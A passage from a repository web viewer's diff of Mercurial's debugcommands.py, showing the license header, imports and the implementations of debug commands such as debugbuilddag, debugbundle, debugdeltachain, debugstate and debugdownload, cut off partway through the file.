##// END OF EJS Templates
util: don't log low-level I/O calls for HTTP peer...
Gregory Szorc -
r37062:d3a9036d default
parent child Browse files
Show More
@@ -1,3006 +1,3010 b''
1 1 # debugcommands.py - command processing for debug* commands
2 2 #
3 3 # Copyright 2005-2016 Matt Mackall <mpm@selenic.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import codecs
11 11 import collections
12 12 import difflib
13 13 import errno
14 14 import operator
15 15 import os
16 16 import random
17 17 import re
18 18 import socket
19 19 import ssl
20 20 import stat
21 21 import string
22 22 import subprocess
23 23 import sys
24 24 import tempfile
25 25 import time
26 26
27 27 from .i18n import _
28 28 from .node import (
29 29 bin,
30 30 hex,
31 31 nullhex,
32 32 nullid,
33 33 nullrev,
34 34 short,
35 35 )
36 36 from . import (
37 37 bundle2,
38 38 changegroup,
39 39 cmdutil,
40 40 color,
41 41 context,
42 42 dagparser,
43 43 dagutil,
44 44 encoding,
45 45 error,
46 46 exchange,
47 47 extensions,
48 48 filemerge,
49 49 fileset,
50 50 formatter,
51 51 hg,
52 52 httppeer,
53 53 localrepo,
54 54 lock as lockmod,
55 55 logcmdutil,
56 56 merge as mergemod,
57 57 obsolete,
58 58 obsutil,
59 59 phases,
60 60 policy,
61 61 pvec,
62 62 pycompat,
63 63 registrar,
64 64 repair,
65 65 revlog,
66 66 revset,
67 67 revsetlang,
68 68 scmutil,
69 69 setdiscovery,
70 70 simplemerge,
71 71 smartset,
72 72 sshpeer,
73 73 sslutil,
74 74 streamclone,
75 75 templater,
76 76 treediscovery,
77 77 upgrade,
78 78 url as urlmod,
79 79 util,
80 80 vfs as vfsmod,
81 81 wireprotoserver,
82 82 )
83 83 from .utils import dateutil
84 84
85 85 release = lockmod.release
86 86
87 87 command = registrar.command()
88 88
89 89 @command('debugancestor', [], _('[INDEX] REV1 REV2'), optionalrepo=True)
90 90 def debugancestor(ui, repo, *args):
91 91 """find the ancestor revision of two revisions in a given index"""
92 92 if len(args) == 3:
93 93 index, rev1, rev2 = args
94 94 r = revlog.revlog(vfsmod.vfs(pycompat.getcwd(), audit=False), index)
95 95 lookup = r.lookup
96 96 elif len(args) == 2:
97 97 if not repo:
98 98 raise error.Abort(_('there is no Mercurial repository here '
99 99 '(.hg not found)'))
100 100 rev1, rev2 = args
101 101 r = repo.changelog
102 102 lookup = repo.lookup
103 103 else:
104 104 raise error.Abort(_('either two or three arguments required'))
105 105 a = r.ancestor(lookup(rev1), lookup(rev2))
106 106 ui.write('%d:%s\n' % (r.rev(a), hex(a)))
107 107
108 108 @command('debugapplystreamclonebundle', [], 'FILE')
109 109 def debugapplystreamclonebundle(ui, repo, fname):
110 110 """apply a stream clone bundle file"""
111 111 f = hg.openpath(ui, fname)
112 112 gen = exchange.readbundle(ui, f, fname)
113 113 gen.apply(repo)
114 114
115 115 @command('debugbuilddag',
116 116 [('m', 'mergeable-file', None, _('add single file mergeable changes')),
117 117 ('o', 'overwritten-file', None, _('add single file all revs overwrite')),
118 118 ('n', 'new-file', None, _('add new file at each rev'))],
119 119 _('[OPTION]... [TEXT]'))
120 120 def debugbuilddag(ui, repo, text=None,
121 121 mergeable_file=False,
122 122 overwritten_file=False,
123 123 new_file=False):
124 124 """builds a repo with a given DAG from scratch in the current empty repo
125 125
126 126 The description of the DAG is read from stdin if not given on the
127 127 command line.
128 128
129 129 Elements:
130 130
131 131 - "+n" is a linear run of n nodes based on the current default parent
132 132 - "." is a single node based on the current default parent
133 133 - "$" resets the default parent to null (implied at the start);
134 134 otherwise the default parent is always the last node created
135 135 - "<p" sets the default parent to the backref p
136 136 - "*p" is a fork at parent p, which is a backref
137 137 - "*p1/p2" is a merge of parents p1 and p2, which are backrefs
138 138 - "/p2" is a merge of the preceding node and p2
139 139 - ":tag" defines a local tag for the preceding node
140 140 - "@branch" sets the named branch for subsequent nodes
141 141 - "#...\\n" is a comment up to the end of the line
142 142
143 143 Whitespace between the above elements is ignored.
144 144
145 145 A backref is either
146 146
147 147 - a number n, which references the node curr-n, where curr is the current
148 148 node, or
149 149 - the name of a local tag you placed earlier using ":tag", or
150 150 - empty to denote the default parent.
151 151
152 152 All string valued-elements are either strictly alphanumeric, or must
153 153 be enclosed in double quotes ("..."), with "\\" as escape character.
154 154 """
155 155
156 156 if text is None:
157 157 ui.status(_("reading DAG from stdin\n"))
158 158 text = ui.fin.read()
159 159
160 160 cl = repo.changelog
161 161 if len(cl) > 0:
162 162 raise error.Abort(_('repository is not empty'))
163 163
164 164 # determine number of revs in DAG
165 165 total = 0
166 166 for type, data in dagparser.parsedag(text):
167 167 if type == 'n':
168 168 total += 1
169 169
170 170 if mergeable_file:
171 171 linesperrev = 2
172 172 # make a file with k lines per rev
173 173 initialmergedlines = ['%d' % i for i in xrange(0, total * linesperrev)]
174 174 initialmergedlines.append("")
175 175
176 176 tags = []
177 177
178 178 wlock = lock = tr = None
179 179 try:
180 180 wlock = repo.wlock()
181 181 lock = repo.lock()
182 182 tr = repo.transaction("builddag")
183 183
184 184 at = -1
185 185 atbranch = 'default'
186 186 nodeids = []
187 187 id = 0
188 188 ui.progress(_('building'), id, unit=_('revisions'), total=total)
189 189 for type, data in dagparser.parsedag(text):
190 190 if type == 'n':
191 191 ui.note(('node %s\n' % pycompat.bytestr(data)))
192 192 id, ps = data
193 193
194 194 files = []
195 195 filecontent = {}
196 196
197 197 p2 = None
198 198 if mergeable_file:
199 199 fn = "mf"
200 200 p1 = repo[ps[0]]
201 201 if len(ps) > 1:
202 202 p2 = repo[ps[1]]
203 203 pa = p1.ancestor(p2)
204 204 base, local, other = [x[fn].data() for x in (pa, p1,
205 205 p2)]
206 206 m3 = simplemerge.Merge3Text(base, local, other)
207 207 ml = [l.strip() for l in m3.merge_lines()]
208 208 ml.append("")
209 209 elif at > 0:
210 210 ml = p1[fn].data().split("\n")
211 211 else:
212 212 ml = initialmergedlines
213 213 ml[id * linesperrev] += " r%i" % id
214 214 mergedtext = "\n".join(ml)
215 215 files.append(fn)
216 216 filecontent[fn] = mergedtext
217 217
218 218 if overwritten_file:
219 219 fn = "of"
220 220 files.append(fn)
221 221 filecontent[fn] = "r%i\n" % id
222 222
223 223 if new_file:
224 224 fn = "nf%i" % id
225 225 files.append(fn)
226 226 filecontent[fn] = "r%i\n" % id
227 227 if len(ps) > 1:
228 228 if not p2:
229 229 p2 = repo[ps[1]]
230 230 for fn in p2:
231 231 if fn.startswith("nf"):
232 232 files.append(fn)
233 233 filecontent[fn] = p2[fn].data()
234 234
235 235 def fctxfn(repo, cx, path):
236 236 if path in filecontent:
237 237 return context.memfilectx(repo, cx, path,
238 238 filecontent[path])
239 239 return None
240 240
241 241 if len(ps) == 0 or ps[0] < 0:
242 242 pars = [None, None]
243 243 elif len(ps) == 1:
244 244 pars = [nodeids[ps[0]], None]
245 245 else:
246 246 pars = [nodeids[p] for p in ps]
247 247 cx = context.memctx(repo, pars, "r%i" % id, files, fctxfn,
248 248 date=(id, 0),
249 249 user="debugbuilddag",
250 250 extra={'branch': atbranch})
251 251 nodeid = repo.commitctx(cx)
252 252 nodeids.append(nodeid)
253 253 at = id
254 254 elif type == 'l':
255 255 id, name = data
256 256 ui.note(('tag %s\n' % name))
257 257 tags.append("%s %s\n" % (hex(repo.changelog.node(id)), name))
258 258 elif type == 'a':
259 259 ui.note(('branch %s\n' % data))
260 260 atbranch = data
261 261 ui.progress(_('building'), id, unit=_('revisions'), total=total)
262 262 tr.close()
263 263
264 264 if tags:
265 265 repo.vfs.write("localtags", "".join(tags))
266 266 finally:
267 267 ui.progress(_('building'), None)
268 268 release(tr, lock, wlock)
269 269
270 270 def _debugchangegroup(ui, gen, all=None, indent=0, **opts):
271 271 indent_string = ' ' * indent
272 272 if all:
273 273 ui.write(("%sformat: id, p1, p2, cset, delta base, len(delta)\n")
274 274 % indent_string)
275 275
276 276 def showchunks(named):
277 277 ui.write("\n%s%s\n" % (indent_string, named))
278 278 for deltadata in gen.deltaiter():
279 279 node, p1, p2, cs, deltabase, delta, flags = deltadata
280 280 ui.write("%s%s %s %s %s %s %d\n" %
281 281 (indent_string, hex(node), hex(p1), hex(p2),
282 282 hex(cs), hex(deltabase), len(delta)))
283 283
284 284 chunkdata = gen.changelogheader()
285 285 showchunks("changelog")
286 286 chunkdata = gen.manifestheader()
287 287 showchunks("manifest")
288 288 for chunkdata in iter(gen.filelogheader, {}):
289 289 fname = chunkdata['filename']
290 290 showchunks(fname)
291 291 else:
292 292 if isinstance(gen, bundle2.unbundle20):
293 293 raise error.Abort(_('use debugbundle2 for this file'))
294 294 chunkdata = gen.changelogheader()
295 295 for deltadata in gen.deltaiter():
296 296 node, p1, p2, cs, deltabase, delta, flags = deltadata
297 297 ui.write("%s%s\n" % (indent_string, hex(node)))
298 298
299 299 def _debugobsmarkers(ui, part, indent=0, **opts):
300 300 """display version and markers contained in 'data'"""
301 301 opts = pycompat.byteskwargs(opts)
302 302 data = part.read()
303 303 indent_string = ' ' * indent
304 304 try:
305 305 version, markers = obsolete._readmarkers(data)
306 306 except error.UnknownVersion as exc:
307 307 msg = "%sunsupported version: %s (%d bytes)\n"
308 308 msg %= indent_string, exc.version, len(data)
309 309 ui.write(msg)
310 310 else:
311 311 msg = "%sversion: %d (%d bytes)\n"
312 312 msg %= indent_string, version, len(data)
313 313 ui.write(msg)
314 314 fm = ui.formatter('debugobsolete', opts)
315 315 for rawmarker in sorted(markers):
316 316 m = obsutil.marker(None, rawmarker)
317 317 fm.startitem()
318 318 fm.plain(indent_string)
319 319 cmdutil.showmarker(fm, m)
320 320 fm.end()
321 321
322 322 def _debugphaseheads(ui, data, indent=0):
323 323 """display version and markers contained in 'data'"""
324 324 indent_string = ' ' * indent
325 325 headsbyphase = phases.binarydecode(data)
326 326 for phase in phases.allphases:
327 327 for head in headsbyphase[phase]:
328 328 ui.write(indent_string)
329 329 ui.write('%s %s\n' % (hex(head), phases.phasenames[phase]))
330 330
331 331 def _quasirepr(thing):
332 332 if isinstance(thing, (dict, util.sortdict, collections.OrderedDict)):
333 333 return '{%s}' % (
334 334 b', '.join(b'%s: %s' % (k, thing[k]) for k in sorted(thing)))
335 335 return pycompat.bytestr(repr(thing))
336 336
337 337 def _debugbundle2(ui, gen, all=None, **opts):
338 338 """lists the contents of a bundle2"""
339 339 if not isinstance(gen, bundle2.unbundle20):
340 340 raise error.Abort(_('not a bundle2 file'))
341 341 ui.write(('Stream params: %s\n' % _quasirepr(gen.params)))
342 342 parttypes = opts.get(r'part_type', [])
343 343 for part in gen.iterparts():
344 344 if parttypes and part.type not in parttypes:
345 345 continue
346 346 ui.write('%s -- %s\n' % (part.type, _quasirepr(part.params)))
347 347 if part.type == 'changegroup':
348 348 version = part.params.get('version', '01')
349 349 cg = changegroup.getunbundler(version, part, 'UN')
350 350 if not ui.quiet:
351 351 _debugchangegroup(ui, cg, all=all, indent=4, **opts)
352 352 if part.type == 'obsmarkers':
353 353 if not ui.quiet:
354 354 _debugobsmarkers(ui, part, indent=4, **opts)
355 355 if part.type == 'phase-heads':
356 356 if not ui.quiet:
357 357 _debugphaseheads(ui, part, indent=4)
358 358
359 359 @command('debugbundle',
360 360 [('a', 'all', None, _('show all details')),
361 361 ('', 'part-type', [], _('show only the named part type')),
362 362 ('', 'spec', None, _('print the bundlespec of the bundle'))],
363 363 _('FILE'),
364 364 norepo=True)
365 365 def debugbundle(ui, bundlepath, all=None, spec=None, **opts):
366 366 """lists the contents of a bundle"""
367 367 with hg.openpath(ui, bundlepath) as f:
368 368 if spec:
369 369 spec = exchange.getbundlespec(ui, f)
370 370 ui.write('%s\n' % spec)
371 371 return
372 372
373 373 gen = exchange.readbundle(ui, f, bundlepath)
374 374 if isinstance(gen, bundle2.unbundle20):
375 375 return _debugbundle2(ui, gen, all=all, **opts)
376 376 _debugchangegroup(ui, gen, all=all, **opts)
377 377
378 378 @command('debugcapabilities',
379 379 [], _('PATH'),
380 380 norepo=True)
381 381 def debugcapabilities(ui, path, **opts):
382 382 """lists the capabilities of a remote peer"""
383 383 opts = pycompat.byteskwargs(opts)
384 384 peer = hg.peer(ui, opts, path)
385 385 caps = peer.capabilities()
386 386 ui.write(('Main capabilities:\n'))
387 387 for c in sorted(caps):
388 388 ui.write((' %s\n') % c)
389 389 b2caps = bundle2.bundle2caps(peer)
390 390 if b2caps:
391 391 ui.write(('Bundle2 capabilities:\n'))
392 392 for key, values in sorted(b2caps.iteritems()):
393 393 ui.write((' %s\n') % key)
394 394 for v in values:
395 395 ui.write((' %s\n') % v)
396 396
397 397 @command('debugcheckstate', [], '')
398 398 def debugcheckstate(ui, repo):
399 399 """validate the correctness of the current dirstate"""
400 400 parent1, parent2 = repo.dirstate.parents()
401 401 m1 = repo[parent1].manifest()
402 402 m2 = repo[parent2].manifest()
403 403 errors = 0
404 404 for f in repo.dirstate:
405 405 state = repo.dirstate[f]
406 406 if state in "nr" and f not in m1:
407 407 ui.warn(_("%s in state %s, but not in manifest1\n") % (f, state))
408 408 errors += 1
409 409 if state in "a" and f in m1:
410 410 ui.warn(_("%s in state %s, but also in manifest1\n") % (f, state))
411 411 errors += 1
412 412 if state in "m" and f not in m1 and f not in m2:
413 413 ui.warn(_("%s in state %s, but not in either manifest\n") %
414 414 (f, state))
415 415 errors += 1
416 416 for f in m1:
417 417 state = repo.dirstate[f]
418 418 if state not in "nrm":
419 419 ui.warn(_("%s in manifest1, but listed as state %s") % (f, state))
420 420 errors += 1
421 421 if errors:
422 422 error = _(".hg/dirstate inconsistent with current parent's manifest")
423 423 raise error.Abort(error)
424 424
425 425 @command('debugcolor',
426 426 [('', 'style', None, _('show all configured styles'))],
427 427 'hg debugcolor')
428 428 def debugcolor(ui, repo, **opts):
429 429 """show available color, effects or style"""
430 430 ui.write(('color mode: %s\n') % ui._colormode)
431 431 if opts.get(r'style'):
432 432 return _debugdisplaystyle(ui)
433 433 else:
434 434 return _debugdisplaycolor(ui)
435 435
436 436 def _debugdisplaycolor(ui):
437 437 ui = ui.copy()
438 438 ui._styles.clear()
439 439 for effect in color._activeeffects(ui).keys():
440 440 ui._styles[effect] = effect
441 441 if ui._terminfoparams:
442 442 for k, v in ui.configitems('color'):
443 443 if k.startswith('color.'):
444 444 ui._styles[k] = k[6:]
445 445 elif k.startswith('terminfo.'):
446 446 ui._styles[k] = k[9:]
447 447 ui.write(_('available colors:\n'))
448 448 # sort label with a '_' after the other to group '_background' entry.
449 449 items = sorted(ui._styles.items(),
450 450 key=lambda i: ('_' in i[0], i[0], i[1]))
451 451 for colorname, label in items:
452 452 ui.write(('%s\n') % colorname, label=label)
453 453
454 454 def _debugdisplaystyle(ui):
455 455 ui.write(_('available style:\n'))
456 456 width = max(len(s) for s in ui._styles)
457 457 for label, effects in sorted(ui._styles.items()):
458 458 ui.write('%s' % label, label=label)
459 459 if effects:
460 460 # 50
461 461 ui.write(': ')
462 462 ui.write(' ' * (max(0, width - len(label))))
463 463 ui.write(', '.join(ui.label(e, e) for e in effects.split()))
464 464 ui.write('\n')
465 465
466 466 @command('debugcreatestreamclonebundle', [], 'FILE')
467 467 def debugcreatestreamclonebundle(ui, repo, fname):
468 468 """create a stream clone bundle file
469 469
470 470 Stream bundles are special bundles that are essentially archives of
471 471 revlog files. They are commonly used for cloning very quickly.
472 472 """
473 473 # TODO we may want to turn this into an abort when this functionality
474 474 # is moved into `hg bundle`.
475 475 if phases.hassecret(repo):
476 476 ui.warn(_('(warning: stream clone bundle will contain secret '
477 477 'revisions)\n'))
478 478
479 479 requirements, gen = streamclone.generatebundlev1(repo)
480 480 changegroup.writechunks(ui, gen, fname)
481 481
482 482 ui.write(_('bundle requirements: %s\n') % ', '.join(sorted(requirements)))
483 483
484 484 @command('debugdag',
485 485 [('t', 'tags', None, _('use tags as labels')),
486 486 ('b', 'branches', None, _('annotate with branch names')),
487 487 ('', 'dots', None, _('use dots for runs')),
488 488 ('s', 'spaces', None, _('separate elements by spaces'))],
489 489 _('[OPTION]... [FILE [REV]...]'),
490 490 optionalrepo=True)
491 491 def debugdag(ui, repo, file_=None, *revs, **opts):
492 492 """format the changelog or an index DAG as a concise textual description
493 493
494 494 If you pass a revlog index, the revlog's DAG is emitted. If you list
495 495 revision numbers, they get labeled in the output as rN.
496 496
497 497 Otherwise, the changelog DAG of the current repo is emitted.
498 498 """
499 499 spaces = opts.get(r'spaces')
500 500 dots = opts.get(r'dots')
501 501 if file_:
502 502 rlog = revlog.revlog(vfsmod.vfs(pycompat.getcwd(), audit=False),
503 503 file_)
504 504 revs = set((int(r) for r in revs))
505 505 def events():
506 506 for r in rlog:
507 507 yield 'n', (r, list(p for p in rlog.parentrevs(r)
508 508 if p != -1))
509 509 if r in revs:
510 510 yield 'l', (r, "r%i" % r)
511 511 elif repo:
512 512 cl = repo.changelog
513 513 tags = opts.get(r'tags')
514 514 branches = opts.get(r'branches')
515 515 if tags:
516 516 labels = {}
517 517 for l, n in repo.tags().items():
518 518 labels.setdefault(cl.rev(n), []).append(l)
519 519 def events():
520 520 b = "default"
521 521 for r in cl:
522 522 if branches:
523 523 newb = cl.read(cl.node(r))[5]['branch']
524 524 if newb != b:
525 525 yield 'a', newb
526 526 b = newb
527 527 yield 'n', (r, list(p for p in cl.parentrevs(r)
528 528 if p != -1))
529 529 if tags:
530 530 ls = labels.get(r)
531 531 if ls:
532 532 for l in ls:
533 533 yield 'l', (r, l)
534 534 else:
535 535 raise error.Abort(_('need repo for changelog dag'))
536 536
537 537 for line in dagparser.dagtextlines(events(),
538 538 addspaces=spaces,
539 539 wraplabels=True,
540 540 wrapannotations=True,
541 541 wrapnonlinear=dots,
542 542 usedots=dots,
543 543 maxlinewidth=70):
544 544 ui.write(line)
545 545 ui.write("\n")
546 546
547 547 @command('debugdata', cmdutil.debugrevlogopts, _('-c|-m|FILE REV'))
548 548 def debugdata(ui, repo, file_, rev=None, **opts):
549 549 """dump the contents of a data file revision"""
550 550 opts = pycompat.byteskwargs(opts)
551 551 if opts.get('changelog') or opts.get('manifest') or opts.get('dir'):
552 552 if rev is not None:
553 553 raise error.CommandError('debugdata', _('invalid arguments'))
554 554 file_, rev = None, file_
555 555 elif rev is None:
556 556 raise error.CommandError('debugdata', _('invalid arguments'))
557 557 r = cmdutil.openrevlog(repo, 'debugdata', file_, opts)
558 558 try:
559 559 ui.write(r.revision(r.lookup(rev), raw=True))
560 560 except KeyError:
561 561 raise error.Abort(_('invalid revision identifier %s') % rev)
562 562
563 563 @command('debugdate',
564 564 [('e', 'extended', None, _('try extended date formats'))],
565 565 _('[-e] DATE [RANGE]'),
566 566 norepo=True, optionalrepo=True)
567 567 def debugdate(ui, date, range=None, **opts):
568 568 """parse and display a date"""
569 569 if opts[r"extended"]:
570 570 d = dateutil.parsedate(date, util.extendeddateformats)
571 571 else:
572 572 d = dateutil.parsedate(date)
573 573 ui.write(("internal: %d %d\n") % d)
574 574 ui.write(("standard: %s\n") % dateutil.datestr(d))
575 575 if range:
576 576 m = dateutil.matchdate(range)
577 577 ui.write(("match: %s\n") % m(d[0]))
578 578
579 579 @command('debugdeltachain',
580 580 cmdutil.debugrevlogopts + cmdutil.formatteropts,
581 581 _('-c|-m|FILE'),
582 582 optionalrepo=True)
583 583 def debugdeltachain(ui, repo, file_=None, **opts):
584 584 """dump information about delta chains in a revlog
585 585
586 586 Output can be templatized. Available template keywords are:
587 587
588 588 :``rev``: revision number
589 589 :``chainid``: delta chain identifier (numbered by unique base)
590 590 :``chainlen``: delta chain length to this revision
591 591 :``prevrev``: previous revision in delta chain
592 592 :``deltatype``: role of delta / how it was computed
593 593 :``compsize``: compressed size of revision
594 594 :``uncompsize``: uncompressed size of revision
595 595 :``chainsize``: total size of compressed revisions in chain
596 596 :``chainratio``: total chain size divided by uncompressed revision size
597 597 (new delta chains typically start at ratio 2.00)
598 598 :``lindist``: linear distance from base revision in delta chain to end
599 599 of this revision
600 600 :``extradist``: total size of revisions not part of this delta chain from
601 601 base of delta chain to end of this revision; a measurement
602 602 of how much extra data we need to read/seek across to read
603 603 the delta chain for this revision
604 604 :``extraratio``: extradist divided by chainsize; another representation of
605 605 how much unrelated data is needed to load this delta chain
606 606
607 607 If the repository is configured to use the sparse read, additional keywords
608 608 are available:
609 609
610 610 :``readsize``: total size of data read from the disk for a revision
611 611 (sum of the sizes of all the blocks)
612 612 :``largestblock``: size of the largest block of data read from the disk
613 613 :``readdensity``: density of useful bytes in the data read from the disk
614 614 :``srchunks``: in how many data hunks the whole revision would be read
615 615
616 616 The sparse read can be enabled with experimental.sparse-read = True
617 617 """
618 618 opts = pycompat.byteskwargs(opts)
619 619 r = cmdutil.openrevlog(repo, 'debugdeltachain', file_, opts)
620 620 index = r.index
621 621 generaldelta = r.version & revlog.FLAG_GENERALDELTA
622 622 withsparseread = getattr(r, '_withsparseread', False)
623 623
624 624 def revinfo(rev):
625 625 e = index[rev]
626 626 compsize = e[1]
627 627 uncompsize = e[2]
628 628 chainsize = 0
629 629
630 630 if generaldelta:
631 631 if e[3] == e[5]:
632 632 deltatype = 'p1'
633 633 elif e[3] == e[6]:
634 634 deltatype = 'p2'
635 635 elif e[3] == rev - 1:
636 636 deltatype = 'prev'
637 637 elif e[3] == rev:
638 638 deltatype = 'base'
639 639 else:
640 640 deltatype = 'other'
641 641 else:
642 642 if e[3] == rev:
643 643 deltatype = 'base'
644 644 else:
645 645 deltatype = 'prev'
646 646
647 647 chain = r._deltachain(rev)[0]
648 648 for iterrev in chain:
649 649 e = index[iterrev]
650 650 chainsize += e[1]
651 651
652 652 return compsize, uncompsize, deltatype, chain, chainsize
653 653
654 654 fm = ui.formatter('debugdeltachain', opts)
655 655
656 656 fm.plain(' rev chain# chainlen prev delta '
657 657 'size rawsize chainsize ratio lindist extradist '
658 658 'extraratio')
659 659 if withsparseread:
660 660 fm.plain(' readsize largestblk rddensity srchunks')
661 661 fm.plain('\n')
662 662
663 663 chainbases = {}
664 664 for rev in r:
665 665 comp, uncomp, deltatype, chain, chainsize = revinfo(rev)
666 666 chainbase = chain[0]
667 667 chainid = chainbases.setdefault(chainbase, len(chainbases) + 1)
668 668 start = r.start
669 669 length = r.length
670 670 basestart = start(chainbase)
671 671 revstart = start(rev)
672 672 lineardist = revstart + comp - basestart
673 673 extradist = lineardist - chainsize
674 674 try:
675 675 prevrev = chain[-2]
676 676 except IndexError:
677 677 prevrev = -1
678 678
679 679 chainratio = float(chainsize) / float(uncomp)
680 680 extraratio = float(extradist) / float(chainsize)
681 681
682 682 fm.startitem()
683 683 fm.write('rev chainid chainlen prevrev deltatype compsize '
684 684 'uncompsize chainsize chainratio lindist extradist '
685 685 'extraratio',
686 686 '%7d %7d %8d %8d %7s %10d %10d %10d %9.5f %9d %9d %10.5f',
687 687 rev, chainid, len(chain), prevrev, deltatype, comp,
688 688 uncomp, chainsize, chainratio, lineardist, extradist,
689 689 extraratio,
690 690 rev=rev, chainid=chainid, chainlen=len(chain),
691 691 prevrev=prevrev, deltatype=deltatype, compsize=comp,
692 692 uncompsize=uncomp, chainsize=chainsize,
693 693 chainratio=chainratio, lindist=lineardist,
694 694 extradist=extradist, extraratio=extraratio)
695 695 if withsparseread:
696 696 readsize = 0
697 697 largestblock = 0
698 698 srchunks = 0
699 699
700 700 for revschunk in revlog._slicechunk(r, chain):
701 701 srchunks += 1
702 702 blkend = start(revschunk[-1]) + length(revschunk[-1])
703 703 blksize = blkend - start(revschunk[0])
704 704
705 705 readsize += blksize
706 706 if largestblock < blksize:
707 707 largestblock = blksize
708 708
709 709 readdensity = float(chainsize) / float(readsize)
710 710
711 711 fm.write('readsize largestblock readdensity srchunks',
712 712 ' %10d %10d %9.5f %8d',
713 713 readsize, largestblock, readdensity, srchunks,
714 714 readsize=readsize, largestblock=largestblock,
715 715 readdensity=readdensity, srchunks=srchunks)
716 716
717 717 fm.plain('\n')
718 718
719 719 fm.end()
720 720
721 721 @command('debugdirstate|debugstate',
722 722 [('', 'nodates', None, _('do not display the saved mtime')),
723 723 ('', 'datesort', None, _('sort by saved mtime'))],
724 724 _('[OPTION]...'))
725 725 def debugstate(ui, repo, **opts):
726 726 """show the contents of the current dirstate"""
727 727
728 728 nodates = opts.get(r'nodates')
729 729 datesort = opts.get(r'datesort')
730 730
731 731 timestr = ""
732 732 if datesort:
733 733 keyfunc = lambda x: (x[1][3], x[0]) # sort by mtime, then by filename
734 734 else:
735 735 keyfunc = None # sort by filename
736 736 for file_, ent in sorted(repo.dirstate._map.iteritems(), key=keyfunc):
737 737 if ent[3] == -1:
738 738 timestr = 'unset '
739 739 elif nodates:
740 740 timestr = 'set '
741 741 else:
742 742 timestr = time.strftime(r"%Y-%m-%d %H:%M:%S ",
743 743 time.localtime(ent[3]))
744 744 timestr = encoding.strtolocal(timestr)
745 745 if ent[1] & 0o20000:
746 746 mode = 'lnk'
747 747 else:
748 748 mode = '%3o' % (ent[1] & 0o777 & ~util.umask)
749 749 ui.write("%c %s %10d %s%s\n" % (ent[0], mode, ent[2], timestr, file_))
750 750 for f in repo.dirstate.copies():
751 751 ui.write(_("copy: %s -> %s\n") % (repo.dirstate.copied(f), f))
752 752
753 753 @command('debugdiscovery',
754 754 [('', 'old', None, _('use old-style discovery')),
755 755 ('', 'nonheads', None,
756 756 _('use old-style discovery with non-heads included')),
757 757 ('', 'rev', [], 'restrict discovery to this set of revs'),
758 758 ] + cmdutil.remoteopts,
759 759 _('[--rev REV] [OTHER]'))
760 760 def debugdiscovery(ui, repo, remoteurl="default", **opts):
761 761 """runs the changeset discovery protocol in isolation"""
762 762 opts = pycompat.byteskwargs(opts)
763 763 remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl))
764 764 remote = hg.peer(repo, opts, remoteurl)
765 765 ui.status(_('comparing with %s\n') % util.hidepassword(remoteurl))
766 766
767 767 # make sure tests are repeatable
768 768 random.seed(12323)
769 769
770 770 def doit(pushedrevs, remoteheads, remote=remote):
771 771 if opts.get('old'):
772 772 if not util.safehasattr(remote, 'branches'):
773 773 # enable in-client legacy support
774 774 remote = localrepo.locallegacypeer(remote.local())
775 775 common, _in, hds = treediscovery.findcommonincoming(repo, remote,
776 776 force=True)
777 777 common = set(common)
778 778 if not opts.get('nonheads'):
779 779 ui.write(("unpruned common: %s\n") %
780 780 " ".join(sorted(short(n) for n in common)))
781 781 dag = dagutil.revlogdag(repo.changelog)
782 782 all = dag.ancestorset(dag.internalizeall(common))
783 783 common = dag.externalizeall(dag.headsetofconnecteds(all))
784 784 else:
785 785 nodes = None
786 786 if pushedrevs:
787 787 revs = scmutil.revrange(repo, pushedrevs)
788 788 nodes = [repo[r].node() for r in revs]
789 789 common, any, hds = setdiscovery.findcommonheads(ui, repo, remote,
790 790 ancestorsof=nodes)
791 791 common = set(common)
792 792 rheads = set(hds)
793 793 lheads = set(repo.heads())
794 794 ui.write(("common heads: %s\n") %
795 795 " ".join(sorted(short(n) for n in common)))
796 796 if lheads <= common:
797 797 ui.write(("local is subset\n"))
798 798 elif rheads <= common:
799 799 ui.write(("remote is subset\n"))
800 800
801 801 remoterevs, _checkout = hg.addbranchrevs(repo, remote, branches, revs=None)
802 802 localrevs = opts['rev']
803 803 doit(localrevs, remoterevs)
804 804
805 805 _chunksize = 4 << 10
806 806
807 807 @command('debugdownload',
808 808 [
809 809 ('o', 'output', '', _('path')),
810 810 ],
811 811 optionalrepo=True)
812 812 def debugdownload(ui, repo, url, output=None, **opts):
813 813 """download a resource using Mercurial logic and config
814 814 """
815 815 fh = urlmod.open(ui, url, output)
816 816
817 817 dest = ui
818 818 if output:
819 819 dest = open(output, "wb", _chunksize)
820 820 try:
821 821 data = fh.read(_chunksize)
822 822 while data:
823 823 dest.write(data)
824 824 data = fh.read(_chunksize)
825 825 finally:
826 826 if output:
827 827 dest.close()
828 828
829 829 @command('debugextensions', cmdutil.formatteropts, [], norepo=True)
830 830 def debugextensions(ui, **opts):
831 831 '''show information about active extensions'''
832 832 opts = pycompat.byteskwargs(opts)
833 833 exts = extensions.extensions(ui)
834 834 hgver = util.version()
835 835 fm = ui.formatter('debugextensions', opts)
836 836 for extname, extmod in sorted(exts, key=operator.itemgetter(0)):
837 837 isinternal = extensions.ismoduleinternal(extmod)
838 838 extsource = pycompat.fsencode(extmod.__file__)
839 839 if isinternal:
840 840 exttestedwith = [] # never expose magic string to users
841 841 else:
842 842 exttestedwith = getattr(extmod, 'testedwith', '').split()
843 843 extbuglink = getattr(extmod, 'buglink', None)
844 844
845 845 fm.startitem()
846 846
847 847 if ui.quiet or ui.verbose:
848 848 fm.write('name', '%s\n', extname)
849 849 else:
850 850 fm.write('name', '%s', extname)
851 851 if isinternal or hgver in exttestedwith:
852 852 fm.plain('\n')
853 853 elif not exttestedwith:
854 854 fm.plain(_(' (untested!)\n'))
855 855 else:
856 856 lasttestedversion = exttestedwith[-1]
857 857 fm.plain(' (%s!)\n' % lasttestedversion)
858 858
859 859 fm.condwrite(ui.verbose and extsource, 'source',
860 860 _(' location: %s\n'), extsource or "")
861 861
862 862 if ui.verbose:
863 863 fm.plain(_(' bundled: %s\n') % ['no', 'yes'][isinternal])
864 864 fm.data(bundled=isinternal)
865 865
866 866 fm.condwrite(ui.verbose and exttestedwith, 'testedwith',
867 867 _(' tested with: %s\n'),
868 868 fm.formatlist(exttestedwith, name='ver'))
869 869
870 870 fm.condwrite(ui.verbose and extbuglink, 'buglink',
871 871 _(' bug reporting: %s\n'), extbuglink or "")
872 872
873 873 fm.end()
874 874
875 875 @command('debugfileset',
876 876 [('r', 'rev', '', _('apply the filespec on this revision'), _('REV'))],
877 877 _('[-r REV] FILESPEC'))
878 878 def debugfileset(ui, repo, expr, **opts):
